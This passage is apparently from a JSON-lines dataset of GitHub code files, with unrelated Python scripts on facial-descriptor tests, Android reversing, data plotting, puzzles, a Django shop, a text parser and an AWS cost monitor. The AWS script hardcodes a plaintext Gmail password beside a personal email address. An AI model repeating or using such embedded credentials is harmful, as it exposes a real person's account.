Path:\"))\n\n @unittest.skipIf(not ConfigLoader.get_int_property(\"test_reextract\"), \"disable re-extract tests\")\n def test_reextract_non_exist_descriptor(self):\n descriptor_1 = self.createDescriptor(TestReExtract.employer)\n descriptor_2 = str(uuid4())\n descriptor_3 = str(uuid4())\n\n response = TestReExtract.admin_client.start_reextract_descriptors({\"descriptors\": [descriptor_1, descriptor_2,\n descriptor_3]})\n task_id = response.content[\"task_id\"]\n\n time.sleep(2)\n\n self.assertEqual(201, response.status_code)\n self.assert_done_task(task_id, 2)\n self.assert_image_not_found(task_id, [descriptor_2, descriptor_3])\n","repo_name":"qonteo/luna","sub_path":"luna_v.3.3.3/luna-admin/tests/tests_api/reextract_descriptors.py","file_name":"reextract_descriptors.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70345539307","text":"import GdaImport\r\n#gjden\r\n#example of dumping all the callors of a method\r\ndef GDA_MAIN(gda_obj):\r\n gda=gda_obj\r\n Dex0=gda.DexList[0]\r\n try:\r\n calleeStr=\"\"\r\n for method in Dex0.MethodList:\r\n if len(method.refMethodIdxList)>5:\r\n calleeStr=\"the [%d] callees of the method: %s\\n\\n\" % (len(method.refMethodIdxList),method.methodFullName)\r\n #gda.log(calleeStr)\r\n for calleeidx in method.refMethodIdxList:\r\n index=str(calleeidx)\r\n if index in Dex0.MethodTable:\r\n obj=Dex0.MethodTable[index]\r\n calleeStr+=obj.methodFullName+obj.MethodSignature\r\n else:\r\n calleeStr+=gda.GetMethodNameById(calleeidx)\r\n calleeStr+=\"\\n\"\r\n break;\r\n gda.log(calleeStr)\r\n except Exception as e:\r\n gda.log(str(e))\r\n return 0","repo_name":"charles2gan/GDA-android-reversing-Tool","sub_path":"python sample/example3-callee.py","file_name":"example3-callee.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":3662,"dataset":"github-code","pt":"37"} +{"seq_id":"70815826026","text":"import matplotlib\r\nmatplotlib.use('Agg')\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nimport csv\r\n\r\ndef main():\r\n filename = './datasets/craft-cans/beers_clean.csv'\r\n abv_col = 1\r\n ibu_col = 2\r\n style_col = 5\r\n\r\n # filename = './datasets/beer-recipes/recipeData.csv'\r\n # abv_col = 8\r\n # ibu_col = 9\r\n # style_col = 3\r\n\r\n threshold = 10\r\n\r\n data = None\r\n with open(filename, 'r', encoding='latin-1') as f:\r\n data = np.array(list(csv.reader(f))[1:])\r\n\r\n data = data[data[:, abv_col] != '']\r\n data = data[data[:, ibu_col] != '']\r\n data = data[data[:, style_col] != '']\r\n\r\n styles = np.unique(data[:, style_col])\r\n subsets = {key: [] for key in styles}\r\n for row in data:\r\n subsets[row[style_col]].append(row)\r\n\r\n # for k in sorted(subsets):\r\n # data = np.asarray(subsets[k])\r\n # if (len(data) > threshold):\r\n # abv = data[:, abv_col].astype(float)\r\n # ibu = data[:, ibu_col].astype(float)\r\n # labels = data[:, style_col]\r\n\r\n # fig = plt.figure(figsize=(10,5))\r\n # plt.xlabel('ABV')\r\n # plt.ylabel('IBU')\r\n \r\n # plt.scatter(abv, ibu, label=labels, s=50, alpha=.5)\r\n # fig.tight_layout()\r\n # fig.savefig('beers_' + str(k).replace(' ', '_').replace('/', '_') + '.png')\r\n # plt.close(fig)\r\n \r\n fig_all = plt.figure(figsize=(10,5))\r\n plt.xlabel('ABV')\r\n plt.ylabel('IBU')\r\n for k in sorted(subsets):\r\n data = np.asarray(subsets[k])\r\n if (len(data) > threshold):\r\n abv = data[:, abv_col].astype(float)\r\n ibu = data[:, 
ibu_col].astype(float)\r\n labels = data[:, style_col]\r\n plt.scatter(abv, ibu, label=labels, s=50, alpha=.5)\r\n\r\n fig_all.tight_layout()\r\n fig_all.savefig('all_beers_abv_ibu.png')\r\n plt.close(fig_all)\r\n\r\n \r\n\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"ssulkar/466lab1","sub_path":"beer/visualize_data.py","file_name":"visualize_data.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42822718914","text":"\"\"\"\nSee problem.txt for the full problem description\n\nThe score for a single round is the score for the shape you selected \n(1 for Rock, 2 for Paper, and 3 for Scissors) \nplus the score for the outcome of the round \n(0 if you lost, 3 if the round was a draw, and 6 if you won)\n\nRock -> A and X\nPaper -> B and Y\nScissors -> C and Z\n\nInput line format is:\n[A-C] [X-Z]\n\"\"\"\n\nSCORES = {\n \"X\": {\n \"A\": 4,\n \"B\": 1,\n \"C\": 7\n },\n \"Y\": {\n \"A\": 8,\n \"B\": 5,\n \"C\": 2\n },\n \"Z\": {\n \"A\": 3,\n \"B\": 9,\n \"C\": 6\n },\n}\n\n\ndef main():\n with open('input.txt') as f:\n total_score = 0\n for line in f:\n their_move, your_move = line.strip().split()\n print(their_move, your_move, SCORES[your_move][their_move])\n total_score += SCORES[your_move][their_move]\n\n return total_score\n\n\nif __name__ == \"__main__\":\n print(main())\n","repo_name":"meyerkev/advent_of_code_2022","sub_path":"dec2/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13365911483","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 20 13:50:10 2019\n\n@author: aritra.chatterjee\n\"\"\"\nimport boto3\nimport json\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime,timedelta\n\nwith open('rootkey.csv') as key_file:\n keyfile = key_file.readlines()\n \nclient = boto3.client(\n 'ce',\n aws_access_key_id=keyfile[0].split('=')[1][:-1],\n\n aws_secret_access_key=keyfile[1].split('=')[1])\n\n\"\"\"Computation of starting day of the month from current date\"\"\"\n\ncurrent_year_month = datetime.now().strftime('%Y-%m')\nfirst_day = '01'\nstart_bill_date = current_year_month+'-'+first_day\n\nresponse = client.get_cost_and_usage(\n TimePeriod={\n 'Start':start_bill_date,\n 'End': datetime.now().strftime('%Y-%m-%d')\n },\n Granularity = 'MONTHLY',\n Metrics= ['USAGE_QUANTITY','AMORTIZED_COST'],\n GroupBy=[{\n 'Type': 'DIMENSION',\n 'Key': 'INSTANCE_TYPE'}\n ]\n )\n\n# =============================================================================\n# with open(\"cost.json\",\"w\") as cost:\n# json.dump(response,cost)\n# \n# =============================================================================\nresults=response['ResultsByTime']\nresults=results[0]\nusage=results['Groups']\nkeys=[usage[i]['Keys'] for i in range(len(usage))]\ncost = usage[0]['Metrics']['AmortizedCost']['Amount']\nhours=[usage[i]['Metrics']['UsageQuantity']['Amount']for i in range(len(usage))]\nhours_consumption=[round((float(usage[i]['Metrics']['UsageQuantity']['Amount'])/750)*100,2) for i in range(len(usage))]\nCost = float(cost)\ntotal_cost=round( Cost*70.716463,2)\nusage_df=pd.DataFrame(np.column_stack([keys,hours,hours_consumption]),columns=['Instance Type','Hours Consumed(750)','Hours Consumption(%)'])\n\n\n\"\"\"Switch of the ec2 instance\"\"\"\ndata=usage_df[usage_df['Instance Type']=='t2.micro']\nhours=(data['Hours 
Consumption(%)'].values)\nhours = int(float(hours[0]))\n\nif hours > 95:\n \n instance_id='i-0e803b92bf78d32ee'\n \n ec2=boto3.client('ec2','ap-south-1',\n aws_access_key_id=keyfile[0].split('=')[1][:-1],\n aws_secret_access_key=keyfile[1].split('=')[1])\n \n ec2.describe_regions()\n ec2 = boto3.resource('ec2',\n 'ap-south-1',\n aws_access_key_id=keyfile[0].split('=')[1][:-1],\n aws_secret_access_key=keyfile[1].split('=')[1])\n instance = ec2.Instance(instance_id)\n \n instance.stop(True)\n with open('cost_log.txt', 'a+') as log_note:\n log_note.write(\"{}: ec2 instance stopped. \\r\\n\".format(datetime.now().strftime('%Y-%m-%d %H:%M:%S')))\n\nelse: \n with open('cost_log.txt', 'a+') as log_note:\n log_note.write(\"{}: ec2 instance total hour consumption is {} \\r\\n\".format(datetime.now().strftime('%Y-%m-%d %H:%M:%S'),hours_consumption[2]))\n\n \n\n\"\"\"Switch of the RDS Database\"\"\"\nrds=usage_df[usage_df['Instance Type']=='db.t2.micro']\nhours=(rds['Hours Consumption(%)'].values)\nhours = int(float(hours[0]))\n\nif hours > 95:\n client = boto3.client('rds','us-east-1',\n aws_access_key_id=keyfile[0].split('=')[1][:-1],\n aws_secret_access_key=keyfile[1].split('=')[1])\n client.stop_db_instance(DBInstanceIdentifier='richie-database')\n with open('cost_log.txt', 'a+') as log_note:\n log_note.write(\"{}: db2 database instance stopped. \\r\\n\".format(datetime.now().strftime('%Y-%m-%d %H:%M:%S')))\n\n\nelse: \n with open('cost_log.txt', 'a+') as log_note:\n log_note.write(\"{}: db2 instance total hour consumption is {} \\r\\n\".format(datetime.now().strftime('%Y-%m-%d %H:%M:%S'),hours_consumption[1]))\n\nwith open('cost_log.txt', 'a+') as log_note:\n log_note.write(\"{}: The total cost for AWS till this moment is {} \\r\\n\".format(datetime.now().strftime('%Y-%m-%d %H:%M:%S'),total_cost))\n\nimport yagmail\npassword='Anahata@123' ### Password is changed now and cryptography is used on the user credentials.\nyagmail.register(\"richie.chatterjee31@gmail.com\", password)\nyag = yagmail.SMTP(\"richie.chatterjee31@gmail.com\", password)\nhtml_msg = [\"{}: The total cost as of now is Rs {} \\r\\n\".format(datetime.now().strftime('%Y-%m-%d %H:%M:%S'),total_cost),\n r\"C:\\Users\\aritra.chatterjee\\Desktop\\AWS_API_Key\\cost_log.txt\"]\nyag.send('richie.chatterjee31@gmail.com', \"AWS Bill Till This Moment!\", html_msg)\n\n\n","repo_name":"richie312/AWS_Instance_Operation_Automation","sub_path":"cost.py","file_name":"cost.py","file_ext":"py","file_size_in_byte":4368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2529421266","text":"# Day 7: Internet Protocol Version 7\n\ndef is_ABBA(s):\n for i in range(len(s)-3):\n if s[i] == s[i+3] and s[i+1] == s[i+2] and s[i] != s[i+1]:\n return True\n return False\n\ndef split_sequences(IP):\n\n super = True\n super_seqs = []\n hyper_seqs = []\n seq = []\n for c in IP:\n if c == \"[\":\n super = False\n if len(seq) > 0:\n super_seqs.append(\"\".join(seq))\n seq = []\n elif c == \"]\":\n super = True\n if len(seq) > 0:\n hyper_seqs.append(\"\".join(seq))\n seq = []\n else:\n seq.append(c)\n if len(seq) > 0:\n super_seqs.append(\"\".join(seq))\n\n return super_seqs, hyper_seqs\n\ndef supports_TLS(IP):\n\n super_seqs, hyper_seqs = split_sequences(IP)\n\n # Check supernet sequences\n is_abba_super = False\n for seq in super_seqs:\n if is_ABBA(seq):\n is_abba_super = True\n break\n if not is_abba_super:\n return False\n\n # Check hypernet sequences\n is_abba_hyp = False\n for seq in hyper_seqs:\n if 
is_ABBA(seq):\n is_abba_hyp = True\n break\n\n if is_abba_super and not is_abba_hyp:\n return True\n else:\n return False\n\ndef supports_SSL(IP):\n\n super_seqs, hyper_seqs = split_sequences(IP)\n\n # Find ABA blocks in supernet sequences\n ABA_blocks = []\n for s in super_seqs:\n for i in range(len(s)-2):\n if s[i] == s[i+2] and s[i] != s[i+1]:\n ABA_blocks.append(s[i:i+3])\n\n # Check if any ABA block has a corresponding\n # BAB block in hypernet sequences\n for aba in ABA_blocks:\n bab = aba[1] + aba[0] + aba[1]\n for s in hyper_seqs:\n for i in range(len(s)-2):\n if s[i:i+3] == bab:\n return True\n\n return False\n\n# ---------------------------------------\n\nIPs = []\nwith open(\"day7.in\") as f:\n for line in f:\n IPs.append(line.strip())\n\ndo_support = 0\nfor IP in IPs:\n if supports_TLS(IP):\n do_support += 1\n\nprint(\"Part 1:\", do_support)\n\ndo_support = 0\nfor IP in IPs:\n if supports_SSL(IP):\n do_support += 1\nprint(\"Part 2:\", do_support)\n","repo_name":"meithan/AoC16","sub_path":"day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22658882415","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def maxProduct(self, root: Optional[TreeNode]) -> int:\n self.ans=0\n def gettotal(root):\n if not root:\n return 0\n \n left=gettotal(root.left)\n right=gettotal(root.right)\n return (root.val+left+right)\n \n \n def getans(root, totalsum,ans):\n if not root:\n return 0\n \n subtree=0\n subtree+=getans(root.left, totalsum, self.ans)\n subtree+=getans(root.right, totalsum, self.ans)\n subtree+=root.val\n if subtree*(totalsum-subtree)>self.ans:\n self.ans=subtree*(totalsum-subtree)\n \n return subtree\n \n \n totalsum = gettotal(root)\n \n getans(root, totalsum, self.ans)\n return self.ans%1000000007\n \n \n ","repo_name":"harssh1029/Leetcode","sub_path":"1339-maximum-product-of-splitted-binary-tree/1339-maximum-product-of-splitted-binary-tree.py","file_name":"1339-maximum-product-of-splitted-binary-tree.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8944390857","text":"from django.core.paginator import Paginator\nfrom django.db.models import Q\nfrom django.shortcuts import render, get_object_or_404\nfrom django.utils.text import slugify\nfrom django.views.decorators.cache import cache_control\n\nfrom .models import Category, Brand,Product,ProductVariant,ProductImage,Banner,Color\nfrom Cartapp.models import WishListItem\nfrom decimal import Decimal\nimport math\nfrom decimal import Decimal, ROUND_HALF_UP\n@cache_control(no_cache=True, must_revalidate=True, no_store=True)\ndef home(request):\n categories = Category.objects.filter(is_active=True)\n brands = Brand.objects.filter(is_active=True)\n all_banners = Banner.objects.all()\n return render(request, 'home.html', {'categories': categories, 'brands': brands,'all_banners':all_banners})\n\n\n\n\ndef shop(request):\n category_id = request.GET.get('category', 'all')\n brand_id = request.GET.get('brand', 'all')\n\n brands = Brand.objects.filter(is_active=True)\n categories = Category.objects.filter(is_active=True).order_by('name')\n products = Product.objects.filter(category__is_active=True, is_active=True)\n all_variants = 
ProductVariant.objects.filter(is_active=True, product__in=products)\n distinct_colors = Color.objects.filter(productvariant__in=all_variants).distinct()\n current_category = 'All Products'\n\n # Price Range Filter Logic\n price_range_filters = {\n '0-2000': (0, 2000),\n '2000-5000': (2000, 5000),\n '5000-15000': (5000, 15000),\n '15000-30000': (15000, 30000),\n '30000': (30000, None),\n }\n\n selected_price_range = request.GET.get('price_range', None)\n\n if request.method == 'POST':\n selected_brands = request.POST.getlist('brands[]', [])\n if 'all' in selected_brands:\n selected_brands.remove('all')\n if not selected_brands:\n products = Product.objects.filter(is_active=True)\n else:\n products = Product.objects.filter(category__is_active=True, is_active=True,\n brandName__pk__in=selected_brands)\n\n selected_variants = all_variants.filter(product__in=products)\n else:\n if category_id == 'all':\n current_category = 'All Products'\n products = Product.objects.filter(is_active=True).order_by('name')\n elif category_id:\n current_category = Category.objects.get(id=category_id, is_active=True)\n products = Product.objects.filter(category=current_category, is_active=True)\n else:\n products = Product.objects.filter(category__is_active=True, is_active=True)\n current_category = 'All Products'\n\n selected_variants = all_variants.filter(product__in=products)\n\n # Brand Filtering Logic\n if brand_id == 'all':\n selected_brands = []\n else:\n selected_brands = [brand_id]\n\n if selected_brands:\n selected_variants = selected_variants.filter(product__brandName__pk__in=selected_brands)\n\n selected_colors = request.GET.getlist('colors[]', [])\n if selected_colors:\n selected_variants = selected_variants.filter(color__pk__in=selected_colors)\n search_query = request.GET.get('search', None)\n if search_query:\n selected_variants = selected_variants.filter(\n Q(product__name__icontains=search_query) |\n Q(product__brandName__name__icontains=search_query) |\n Q(color__color__icontains=search_query)\n )\n if selected_price_range:\n min_price, max_price = price_range_filters.get(selected_price_range, (0, None))\n if max_price is None:\n selected_variants = selected_variants.filter(price__lt=min_price)\n else:\n selected_variants = selected_variants.filter(price__gte=min_price, price__lte=max_price)\n\n if current_category != 'All Products':\n title = current_category\n elif search_query:\n title = f\"Search Results for '{search_query}'\"\n else:\n title = \"All Products\"\n\n active_offers = {}\n for brand in brands:\n if brand.offer_is_active:\n active_offers[brand.pk] = Decimal(brand.offer_percentage)\n\n for variant in selected_variants:\n brand_pk = variant.product.brandName.pk\n if brand_pk in active_offers:\n offer_percentage = active_offers[brand_pk]\n offer_price = variant.price - (variant.price * (offer_percentage / 100))\n offer_price = offer_price.to_integral_value(rounding=ROUND_HALF_UP)\n variant.offer_price = '{:.2f}'.format(offer_price)\n else:\n variant.offer_price = None\n\n paginator = Paginator(selected_variants, 9)\n page_number = request.GET.get('page')\n page_variants = paginator.get_page(page_number)\n\n context = {\n 'products': products,\n 'categories': categories,\n 'current_category': current_category,\n 'brands': brands,\n 'page_variants': page_variants,\n 'distinct_colors': distinct_colors,\n 'category_id': category_id,\n 'brand_id': brand_id,\n 'selected_colors': selected_colors,\n 'title': title,\n 'active_offers': active_offers,\n 'selected_brands': selected_brands,\n 
'selected_price_range': selected_price_range,\n }\n return render(request, 'shop.html', context)\ndef product_detail(request, slug):\n product = get_object_or_404(Product, slug=slug, is_active=True)\n selected_variant = product.productvariant_set.first() # Assuming you want to display the first color variant initially\n images = selected_variant.images.all() # Retrieve the images associated with the selected variant\n\n if request.method == 'POST':\n selected_variant_id = request.POST.get('variant_id')\n try:\n selected_variant = product.productvariant_set.get(id=selected_variant_id)\n images = selected_variant.images.all() # Retrieve the images associated with the newly selected variant\n except ProductVariant.DoesNotExist:\n # Handle the case where the selected variant doesn't exist for the product\n pass\n\n variants = product.productvariant_set.all() # Retrieve all variants for the product\n\n context = {\n 'product': product,\n 'selected_variant': selected_variant,\n 'images': images,\n 'variants': variants,\n 'is_in_wishlist': WishListItem.objects.filter(wishlist__user=request.user,\n product=selected_variant).exists() if request.user.is_authenticated else False,\n }\n brand = selected_variant.product.brandName\n if brand.offer_is_active:\n offer_percentage = Decimal(brand.offer_percentage)\n offer_price = selected_variant.price * (1 - offer_percentage / 100)\n offer_price=offer_price.to_integral_value(rounding=ROUND_HALF_UP)\n offer_price= '{:.2f}'.format(offer_price)\n context['offer_price'] = offer_price\n return render(request, 'product_detail.html', context)\n","repo_name":"ManavBVijayan/TimesBuy","sub_path":"TimesBuyProject/Store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7005,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"70194566828","text":"n = int(input())\nmatrix = [list(input().rstrip()) for _ in range(n)]\n\ndx = [1, 0, 0, -1]\ndy = [0, 1, -1, 0]\nans = []\n\nfor _ in range(2):\n\n que = []\n visited = [[False for _ in range(n)] for _ in range(n)]\n cnt = 0\n\n for i in range(n):\n for j in range(n):\n if not visited[i][j]:\n que.append([i, j])\n while que:\n x, y = que.pop()\n visited[x][y] = True\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n if 0 <= nx < n and 0 <= ny < n:\n if matrix[i][j] == matrix[nx][ny] and not visited[nx][ny]:\n que.append([nx, ny])\n cnt += 1\n \n ans.append(cnt)\n\n for i in range(n):\n for j in range(n):\n if matrix[i][j] == \"G\":\n matrix[i][j] = \"R\"\n\nprint(ans[0], ans[1])","repo_name":"Eilhwan/algorithms","sub_path":"newOnes/implementations/RedGreen.py","file_name":"RedGreen.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6419382008","text":"# -*- encoding: UTF-8 -*-\n\n'''\n===============================================================================\nSitegen\n\nAuthor: Karlisson M. 
Bezerra\nE-mail: contact@hacktoon.com\nURL: https://github.com/hacktoon/sitegen\nLicense: WTFPL - http://sam.zoy.org/wtfpl/COPYING\n===============================================================================\n'''\n\nfrom .exceptions import PageValueError\n\nNEWLINE = '\\n'\n\nTOK_NAME = 'name'\nTOK_TEXT = 'content'\nTOK_ESCAPE = '\\\\'\nTOK_EOF = '\\0'\nTOK_ASSIGN = '='\nTOK_COMMA = ','\nTOK_OPENLIST = '['\nTOK_CLOSELIST = ']'\nTOK_OPENGROUP = '{'\nTOK_CLOSEGROUP = '}'\n\nKEYCHARS = ''.join([\n NEWLINE,\n TOK_ASSIGN,\n TOK_COMMA,\n TOK_OPENLIST,\n TOK_CLOSELIST,\n TOK_OPENGROUP,\n TOK_CLOSEGROUP\n])\n\ndef _create_env(text):\n data = {}\n return {\n 'index': 0,\n 'text': text,\n 'tokens': [],\n 'current_token': None,\n 'data': data,\n 'stack': [data]\n }\n\ndef _create_token(type, value, line=1, column=0):\n return {\n 'type': type,\n 'value': value,\n 'line': line,\n 'column': column\n }\n\ndef _tokenize(text):\n line = 1\n column = 0\n cache = []\n tokens = []\n inlist = False\n text = text.strip()\n escape = False\n for index, char in enumerate(text):\n if char == TOK_ESCAPE:\n escape = True\n continue\n if char in KEYCHARS and escape:\n cache.append(char)\n column += 1\n escape = False\n continue\n if char not in KEYCHARS or not inlist and char == TOK_COMMA:\n cache.append(char)\n column += 1\n continue\n name = ''.join(cache).strip()\n inlist = {\n TOK_OPENLIST: True,\n TOK_CLOSELIST: False\n }.get(char, inlist)\n if name == TOK_TEXT:\n token = _create_token(TOK_TEXT, text[index:].strip(), line, column)\n tokens.append(token)\n return tokens\n if name:\n tokens.append(_create_token(TOK_NAME, name, line, column))\n if char == NEWLINE:\n line += 1\n column = 0\n else:\n column += 1\n tokens.append(_create_token(char, char, line, column))\n cache = []\n\n # remaining chars\n name = ''.join(cache).strip()\n if name:\n tokens.append(_create_token(TOK_NAME, name, line, column))\n return tokens\n\ndef _error(env, msg):\n token = env['current_token']\n raise PageValueError('{} at line {}, column {}'.format(\n msg, token['line'], token['column']))\n\ndef _next_token(env):\n env['index'] += 1\n try:\n next = env['tokens'][env['index']]\n except IndexError:\n next = _create_token(TOK_EOF, TOK_EOF)\n env['current_token'] = next\n return next\n\ndef _consume(env, expected):\n token = env['current_token']\n if token['type'] == TOK_EOF:\n return\n if token['type'] != expected:\n _error(env, 'Expected a {!r}'.format(expected))\n _next_token(env)\n\ndef _parse_group(env):\n rules = {}\n env['stack'].append(rules)\n while env['current_token']['type'] not in (TOK_CLOSEGROUP, TOK_EOF):\n _parse_rule(env)\n _consume(env, TOK_CLOSEGROUP)\n env['stack'].pop()\n return rules\n\ndef _parse_list(env):\n names = []\n while True:\n token = env['current_token']\n if token['type'] == TOK_CLOSELIST:\n _next_token(env)\n break\n if token['type'] == TOK_NAME:\n names.append(token['value'])\n _next_token(env)\n else:\n _error(env, 'Expected a name, got {!r}'.format(token['value']))\n token = env['current_token']\n if token['type'] == TOK_COMMA:\n token = _next_token(env)\n continue\n elif token['type'] == TOK_CLOSELIST:\n _next_token(env)\n break\n else:\n _error(env, 'Invalid syntax')\n return names\n\ndef _parse_value(env):\n token = env['current_token']\n if token['type'] == TOK_NAME:\n value = token['value']\n _next_token(env)\n elif token['type'] == TOK_OPENLIST:\n _next_token(env)\n value = _parse_list(env)\n elif token['type'] == TOK_OPENGROUP:\n _next_token(env)\n value = _parse_group(env)\n else:\n 
_error(env, 'Invalid value format')\n return value\n\ndef _parse_rule(env):\n token = env['current_token']\n if token['type'] not in (TOK_NAME, TOK_TEXT):\n _error(env, 'Expected a name, got {!r}'.format(token['value']))\n name = token['value']\n if token['type'] == TOK_TEXT:\n if len(env['stack']) > 1:\n _error(env, 'Wrong syntax')\n env['data'][TOK_TEXT] = token['value']\n _next_token(env)\n return\n token = _next_token(env)\n if token['type'] == TOK_ASSIGN:\n _next_token(env)\n value = _parse_value(env)\n env['stack'][-1][name] = value\n elif token['type'] == TOK_EOF:\n _next_token(env)\n return\n else:\n _error(env, 'Invalid syntax')\n\ndef _parse_ruleset(env):\n while env['current_token']['type'] not in (TOK_EOF, TOK_CLOSEGROUP):\n _parse_rule(env)\n return env['data']\n\ndef parse(text):\n if not len(text.strip()):\n return {}\n env = _create_env(text)\n tokens = _tokenize(text)\n env['tokens'] = tokens\n env['current_token'] = tokens[0]\n return _parse_ruleset(env)\n","repo_name":"hacktoon/sitegen","sub_path":"sitegen/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":5392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16337670089","text":"#!/usr/bin/env python3\n\nfrom collections import Counter, defaultdict\nfrom datetime import datetime\nfrom random import shuffle, getstate, setstate, seed\nfrom pickle import load\nfrom argparse import ArgumentParser\nfrom math import sqrt\nfrom sys import stdout\n\nimport pdb\n\nfrom bayes_deanonymize import BayesDeanonymize\nfrom population import PopulationUnpickler\nfrom data_logging import (write_log, change_logfile_name,\n stop_logging, start_logging)\n\nparser = ArgumentParser(description = \"Evaluate performance of classification.\")\nparser.add_argument(\"population\")\nparser.add_argument(\"classifier\")\nparser.add_argument(\"--data-logfile\",\n help = \"Filename to write log data to.\")\nparser.add_argument(\"--num_node\", \"-n\", type = int, default = 10)\nparser.add_argument(\"--test_node\", \"-t\", type = int, action = \"append\")\nparser.add_argument(\"--subset_labeled\", \"-s\", type = int, default = None,\n help = \"Chose a random subset of s nodes from the set of labeled nodes.\")\nparser.add_argument(\"--ibd-threshold\", type = int, default = 5000000,\n help = \"IBD segments smaller than this value will \"\n \"go undetected\")\nparser.add_argument(\"--deterministic_random\", \"-d\", action = \"store_true\",\n help = \"Seed the random number generator such that the same labeled nodes will be chosen on runs with the same number of nodes.\")\nparser.add_argument(\"--deterministic_labeled\", \"-ds\", action = \"store_true\",\n help = \"Seed the random number generator to ensure labeled node subset is deterministic.\")\nargs = parser.parse_args()\n\nif args.data_logfile:\n change_logfile_name(args.data_logfile)\n start_logging()\nelse:\n stop_logging()\n\nwrite_log(\"args\", args)\n\nprint(\"Loading population.\", flush = True)\nwith open(args.population, \"rb\") as pickle_file:\n population = PopulationUnpickler(pickle_file).load()\n\nprint(\"Loading classifier\", flush = True)\nwith open(args.classifier, \"rb\") as pickle_file:\n classifier = load(pickle_file)\n\nnodes = set(member for member in population.members\n if member.genome is not None)\n# nodes = set(member for member in population.generations[-1].members\n# if member.genome is not None)\n\nif args.subset_labeled:\n # we want the labeled nodes to be chosen randomly, but the same\n # 
random nodes chosen every time if the same number of labeled\n # nodes is chosen.\n sorted_labeled = list(classifier._labeled_nodes)\n sorted_labeled.sort()\n if args.deterministic_random or args.deterministic_labeled:\n rand_state = getstate()\n seed(42)\n shuffle(sorted_labeled)\n setstate(rand_state)\n else:\n shuffle(sorted_labeled)\n classifier._labeled_nodes = sorted_labeled[:args.subset_labeled]\n\nwrite_log(\"labeled nodes\", classifier._labeled_nodes)\n\nbayes = BayesDeanonymize(population, classifier)\n\nid_mapping = population.id_mapping\nlabeled_nodes = set(id_mapping[node_id] for node_id\n in classifier._labeled_nodes)\nif args.test_node is not None and len(args.test_node) > 0:\n unlabeled = [id_mapping[node_id] for node_id in args.test_node]\nelse:\n all_unlabeled = list(nodes - labeled_nodes)\n all_unlabeled.sort(key = lambda node: node._id)\n if args.deterministic_random:\n rand_state = getstate()\n seed(43)\n shuffle(all_unlabeled)\n setstate(rand_state)\n else:\n shuffle(all_unlabeled)\n unlabeled = all_unlabeled[:args.num_node]\n\nwrite_log(\"to identify\", [node._id for node in unlabeled])\n\ncorrect = 0\nincorrect = 0\n# Maps generation -> counter with keys \"correct\" and \"incorrect\"\ngeneration_error = defaultdict(Counter)\nno_common_ancestor = 0\ngeneration_map = population.node_to_generation\nskipped = 0\n# write_log(\"labeled_nodes\", [node._id for node in labeled_nodes])\n# write_log(\"target_nodes\", [node._id for node in unlabeled])\nprint(\"Attempting to identify {} random nodes.\".format(len(unlabeled)),\n flush = True)\nwrite_log(\"start time\", datetime.now())\nfor i, node in enumerate(unlabeled):\n print(\"Iteration: {}, actual node ID: {}\".format(i + 1, node._id))\n identified, ln_ratio = bayes.identify(node.genome, node, args.ibd_threshold)\n # if ln_ratio < 0.1:\n # skipped += 1\n # continue\n assert len(identified) > 0\n # pdb.set_trace()\n node_generation = generation_map[node]\n if node in identified:\n generation_error[node_generation][\"correct\"] += 1\n correct += 1\n print(\"correct\")\n else:\n generation_error[node_generation][\"incorrect\"] += 1\n print(\"incorrect\")\n incorrect += 1\n write_log(\"evaluate\", {\"target node\": node._id, \"log ratio\": ln_ratio,\n \"identified\": set(x._id for x in identified)})\n stdout.flush()\n\nwrite_log(\"end time\", datetime.now())\nprint(\"{} skipped\".format(skipped))\nprint(\"{} correct, {} incorrect, {} total.\".format(correct, incorrect,\n len(unlabeled)))\nstdout.flush()\n\nwrite_log(\"correct\", correct)\nwrite_log(\"incorrect\", incorrect)\nwrite_log(\"total\", len(unlabeled))\ntotal = correct + incorrect\npercent_accurate = correct / total\nstd_dev = sqrt(percent_accurate * (1 - percent_accurate) * total) / total\nprint(\"{}±{:0.3} percent accurate.\".format(percent_accurate, std_dev))\nfor generation, counter in generation_error.items():\n gen_correct = counter[\"correct\"]\n gen_incorrect = counter[\"incorrect\"]\n total = gen_correct + gen_incorrect\n format_string = \"For generation {}: {} accuracy, {} total.\"\n print(format_string.format(generation, gen_correct / total, total))\n","repo_name":"AlexxNica/genetic_privacy","sub_path":"predict/evaluate_deanonymize.py","file_name":"evaluate_deanonymize.py","file_ext":"py","file_size_in_byte":5674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"31158972905","text":"from pathlib import Path\n\nimport cv2\nimport numpy as np\nimport torch\n\nfrom models.common import DetectMultiBackend\nfrom 
